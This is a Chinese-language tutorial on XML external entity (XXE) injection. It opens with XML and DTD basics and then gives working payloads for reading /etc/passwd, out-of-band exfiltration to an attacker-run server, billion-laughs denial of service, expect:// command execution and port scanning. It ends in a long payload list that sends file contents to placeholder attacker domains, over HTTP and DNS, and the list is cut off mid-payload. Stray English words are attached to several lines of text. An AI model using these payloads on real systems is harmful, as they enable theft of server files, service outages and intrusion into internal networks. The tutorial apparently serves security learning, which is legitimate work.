淺入深出了解XXE漏洞
環境搭建
https://github.com/c0ny1/xxe-lab
爲了更深刻的理解,我準備理論和實際相結合的瞭解XXE!php
淺談XML
初識XML
一個好的代碼基礎能幫助你更好理解一類漏洞,因此先學習一下XML的基礎知識。java
XML被設計爲傳輸和存儲數據,其焦點是數據的內容,其把數據從HTML分離,是獨立於軟件和硬件的信息傳輸工具,簡單來講XML主要是面向傳輸的。git
什麼是XML?github
XML 指可擴展標記語言(EXtensible Markup Language) XML 是一種標記語言,很相似 HTML XML 的設計宗旨是傳輸數據,而非顯示數據 XML 標籤沒有被預約義。您須要自行定義標籤 XML 被設計爲具備自我描述性 XML 是 W3C 的推薦標準
與HTML的對比web
XML 不是 HTML 的替代 XML 和 HTML 爲不一樣的目的而設計 XML 被設計爲傳輸和存儲數據,其焦點是數據的內容 HTML 被設計用來顯示數據,其焦點是數據的外觀 HTML 旨在顯示信息,而 XML 旨在傳輸信息
XML文檔結構
XML文檔結構包括XML聲明、DTD文檔類型定義(可選)、文檔元素。apache
請看示例:api
<!--XML申明--> <?xml version="1.0"?> <!--文檔類型定義--> <!DOCTYPE note [ <!--定義此文檔是 note 類型的文檔--> <!ELEMENT note (to,from,heading,body)> <!--定義note元素有四個元素--> <!ELEMENT to (#PCDATA)> <!--定義to元素爲」#PCDATA」類型--> <!ELEMENT from (#PCDATA)> <!--定義from元素爲」#PCDATA」類型--> <!ELEMENT head (#PCDATA)> <!--定義head元素爲」#PCDATA」類型--> <!ELEMENT body (#PCDATA)> <!--定義body元素爲」#PCDATA」類型--> ]]]> <!--文檔元素--> <note> <to>wecome</to> <from>to</from> <head>This wave is hacker</head> <body>You are a good hacker</body> </note>
DTD:
文檔類型定義(DTD)可定義合法的XML文檔構建模塊,它使用一系列合法的元素來定義文檔的結構。DTD 可被成行地聲明於XML文檔中(內部引用),也可做爲一個外部引用。tomcat
DTD文檔中有不少重要的關鍵字以下: * DOCTYPE(DTD的聲明) * ENTITY(實體的聲明) * SYSTEM、PUBLIC(外部資源申請)
能夠用以下語法引入外部DTD服務器
<!DOCTYPE 根元素 SYSTEM "文件名">
實體:
實體能夠理解爲變量,其必須在DTD中定義申明,能夠在文檔中的其餘位置引用該變量的值。多線程
實體按類型主要分爲如下四種:
* 內置實體 (Built-in entities)
* 字符實體 (Character entities) * 通用實體 (General entities) * 參數實體 (Parameter entities)
四種實體引用實例
內部實體:
<!ENTITY 實體名稱 "實體的值"> <!ENTITY 實體名稱 SYSTEM "URI">
參數實體:
<!ENTITY % 實體名稱 "實體的值"> <!ENTITY % 實體名稱 "實體的值">
參數實體外實體+內部實體
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY name "nMask">]>
<foo>
<value>&name;</value>
</foo>
參數實體+外部實體
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY name "nMask">]>
<foo>
<value>&name;</value>
</foo>
** 注意:%name(參數實體)是在DTD中被引用的,而&name(其他實體)是在xml文檔中被引用的。
因爲xxe漏洞主要是利用了DTD引用外部實體致使的漏洞,因此咱們特別來分析外部實體 **
外部實體定義
<!ENTITY 實體名稱 SYSTEM "URI">
經過url能夠引用哪些類型的外部實體?固然不一樣的程序語言,所支持的協議是不同的
對照表:
案例演示:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE A [
<!ENTITY Config SYSTEM "file:///etc/passwd">]>
<foo>
<value>&Config;</value>
</foo>
淺談XXE漏洞
XXE漏洞介紹:
XXE漏洞全稱XML External Entity Injection即xml外部實體注入漏洞,XXE漏洞發生在應用程序解析XML輸入時,沒有禁止外部實體的加載,致使可加載惡意外部文件,形成文件讀取、命令執行、內網端口掃描、攻擊內網網站、發起dos攻擊等危害。xxe漏洞觸發的點每每是能夠上傳xml文件的位置,沒有對上傳的xml文件進行過濾,致使可上傳惡意xml文件。此類攻擊可能包括使用file:方案或系統標識符中的本地路徑公開本地文件,其中可能包含敏感數據,例如密碼或私人用戶數據。因爲此類攻擊是相對於處理XML文檔的應用程序而發生的,所以攻擊者可能會使用此受信任的應用程序轉到其餘內部系統,可能經過http(s)請求公開其餘內部內容或啓動CSRF攻擊任何不受保護的內部服務。在某些狀況下,能夠經過取消引用惡意URI來利用容易受到客戶端內存損壞問題影響的XML處理器庫,從而可能容許在應用程序賬戶下執行任意代碼。其餘攻擊能夠訪問可能不會中止返回數據的本地資源,若是未釋放太多線程或進程,也可能會影響應用程序的可用性。
注意:
該應用程序無需顯式將響應返回給攻擊者,由於它很容易受到信息泄露的影響。攻擊者能夠利用DNS信息經過子域名將數據泄漏到他們控制的DNS服務器
發現XXE漏洞
經過提交POST請求XML文件:
注意:提交一個POST請求,請求頭加上Content-type:application/xml
第一步,驗證XML解析器是否解析和執行咱們自定義的XML內容
發送Payload
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE ANY [ <!ENTITY name "hacker">]> <root>&name;</root>
若是服務器返回成功解析xml文檔
將放回內容爲hacker
第二步:是否支持外部實體的引用
利用步驟:
1.自建web網站
2.在測試網站提交payload
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE test [<!ENTITY dtgmlf6ent SYSTEM "http://本身網站ip/文件名">]> <GeneralSearch>&test;</GeneralSearch>
-
查看網站返回內容中是否帶有自建網站文件中的內容
-
查看自建服務器訪問日誌,是否有DTD文件等請求
XXE漏洞利用
1. 任意文件讀取
payload (有回顯)
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <root><name>&xxe;</name></root>
經過外帶(OOB)的方法來檢測(無回顯)
①自建web服務器
②建立接受數據的文件readdata.php
<?php
file_put_contents("passwd.txt", $_GET['file']) ;
?>
③建立hacker.php來供外部實體引用
<?php $xml=<<<EOF <?xml version="1.0"?> <!DOCTYPE ANY[ <!ENTITY % file SYSTEM "file:///etc/passwd"> //被攻擊的服務器 <!ENTITY % remote SYSTEM "http://localhost/hacker.xml"> //自建服務器 %remote; %all; %send; ]> EOF; $data = simplexml_load_string($xml) ; echo "<pre>" ; print_r($data) ; ?>
④建立hacker.xml
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://localhost/readdata.php?file=%file;'>">
當訪問http://localhost/hacker.php, 存在漏洞的服務器會讀出/etc/passwd內容,發送給攻擊者服務器上的hacker.php,而後把讀取的數據保存到本地的passwd.txt中。
2. DOS攻擊:
著名的「billion laughs」就是利用了XXE
payload
<?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>
3.命令執行
php安裝expect擴展能夠直接執行系統命令,其餘協議也有可能能夠執行系統命令。
payload
<?xml version=」1.0″ encoding=」utf-8″?> <!DOCTYPE XXE <!ELEMENT name ANY > <!ENTITY XXE SYSTEM "expect://id" >]> <root> <name>&XXE;</name> </root>
4.端口掃描
端口開放時會返回報錯信息,端口不存在時會沒法鏈接
payload
<?xml version=」1.0″ encoding=」utf-8″?> <!DOCTYPE XXE [ <!ELEMENT name ANY > <!ENTITY XXE SYSTEM "http:/ip:port" >]> <root> <name>&XXE;</name </root>
XXE爆破錶
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.yourdomain[.]com/"/> <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://xxe-xsi-nonamespaceschemalocation.yourdomain[.]com/"/> <?xml version="1.0" encoding="utf-8" standalone="no" ?><xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"><xs:include schemaLocation="http://xxe-xsinclude-schemalocation.yourdomain[.]com/"/></xs:schema> <?xml version="1.0" encoding="utf-8" standalone="no" ?><xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"><xs:include namespace="http://xxe-xsinclude-namespace.yourdomain[.]com/"/></xs:schema> <?xml version="1.0" encoding="utf-8" standalone="no" ?><xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"><xs:import schemaLocation="http://xxe-xsimport-schemalocation.yourdomain[.]com/"/></xs:schema> <?xml version="1.0" encoding="utf-8" standalone="no" ?><xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"><xs:import namespace="http://xxe-xsimport-namespace.yourdomain[.]com/"/></xs:schema> <?xml-stylesheet href="http://xxe-xml-stylesheet.yourdomain[.]com/"?><x /> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"> <!ENTITY % CIMName '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-1.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\wmi20.dtd"> <!ENTITY % CIMName '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-2.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Program Files (x86)\Lotus\Notes\domino.dtd"><!ENTITY % boolean '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-3.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\xwizard.dtd"><!ENTITY % onerrortypes '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-4.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"><!ENTITY % ISOamsa ' <!ENTITY % file SYSTEM "http://exfil-xxe-payload-5.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///usr/local/tomcat/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd"><!ENTITY % URI '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-6.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd"> <!ENTITY % Boolean '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-7.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd"> <!ENTITY % url.attribute.set '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-8.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd"> <!ENTITY % condition 'aaa)> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-9.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd"> <!ENTITY % constant 'aaa)> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-10.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/struts/struts-config_1_1.dtd"> <!ENTITY % AttributeName '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-11.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///u01/oracle/wlserver/server/lib/consoleapp/webapp/WEB-INF/struts-config_1_2.dtd"> <!ENTITY % AttributeName '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-12.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/gtksourceview-4/language-specs/language.dtd"> <!ENTITY % itemattrs '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-13.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/lib/gap/pkg/GAPDoc-1.6.2/bibxmlext.dtd"> <!ENTITY % n.InProceedings 'aaa)> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-14.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/boostbook/dtd/boostbook.dtd"> <!ENTITY % boost.common.attrib '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-15.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///opt/jboss/wildfly/modules/system/layers/base/org/apache/lucene/main/lucene-queryparser-5.5.5.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd"> <!ENTITY % queries 'aaa)> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-16.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///opt/jboss/wildfly/modules/system/layers/base/org/apache/xml-resolver/main/xml-resolver-1.2.jar!/org/apache/xml/resolver/etc/catalog.dtd"> <!ENTITY % publicIdentifier '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-17.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/nmap/nmap.dtd"> <!ENTITY % attr_numeric '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-18.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/liteide/liteeditor/kate/language.dtd"> <!ENTITY % commonAttributes '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-19.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgweather/locations.dtd"> <!ENTITY % name 'aaa)> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-20.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgda-5.0/dtd/libgda-server-operation.dtd"> <!ENTITY % paramlist-dtd ' <!ENTITY % file SYSTEM "http://exfil-xxe-payload-21.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgda-5.0/dtd/libgda-paramlist.dtd"> <!ENTITY % array-dtd ' <!ENTITY % file SYSTEM "http://exfil-xxe-payload-22.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/docutils/docutils.dtd"> <!ENTITY % measure '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-23.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/dblatex/schema/dblatex-config.dtd"> <!ENTITY % attlist.modname '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-24.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/lib64/erlang/lib/docbuilder-0.9.8.11/dtd/application.dtd"> <!ENTITY % block "xxx" > <!ENTITY % common ' <!ENTITY % file SYSTEM "http://exfil-xxe-payload-25.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/local/tomcat/lib/servlet-api.jar!/javax/servlet/resources/XMLSchema.dtd"> <!ENTITY % xs-datatypes ' <!ENTITY % file SYSTEM "http://exfil-xxe-payload-26.yourdomain[.]com"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"> <!ENTITY % CIMName '> <!ENTITY % file "dns-exfil-1"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\wmi20.dtd"> <!ENTITY % CIMName '> <!ENTITY % file "dns-exfil-2"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Program Files (x86)\Lotus\Notes\domino.dtd"><!ENTITY % boolean '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-3"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\xwizard.dtd"><!ENTITY % onerrortypes '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-4"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"><!ENTITY % ISOamsa ' <!ENTITY % file "dns-exfil-5"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///usr/local/tomcat/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd"><!ENTITY % URI '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-6"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd"> <!ENTITY % Boolean '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-7"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd"> <!ENTITY % url.attribute.set '> <!ENTITY % file "dns-exfil-8"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd"> <!ENTITY % condition 'aaa)> <!ENTITY % file "dns-exfil-9"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd"> <!ENTITY % constant 'aaa)> <!ENTITY % file "dns-exfil-10"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/struts/struts-config_1_1.dtd"> <!ENTITY % AttributeName '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-11"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///u01/oracle/wlserver/server/lib/consoleapp/webapp/WEB-INF/struts-config_1_2.dtd"> <!ENTITY % AttributeName '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-12"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/gtksourceview-4/language-specs/language.dtd"> <!ENTITY % itemattrs '> <!ENTITY % file "dns-exfil-13"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/lib/gap/pkg/GAPDoc-1.6.2/bibxmlext.dtd"> <!ENTITY % n.InProceedings 'aaa)> <!ENTITY % file "dns-exfil-14"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/boostbook/dtd/boostbook.dtd"> <!ENTITY % boost.common.attrib '> <!ENTITY % file "dns-exfil-15"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.yourdomain[.]com/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM 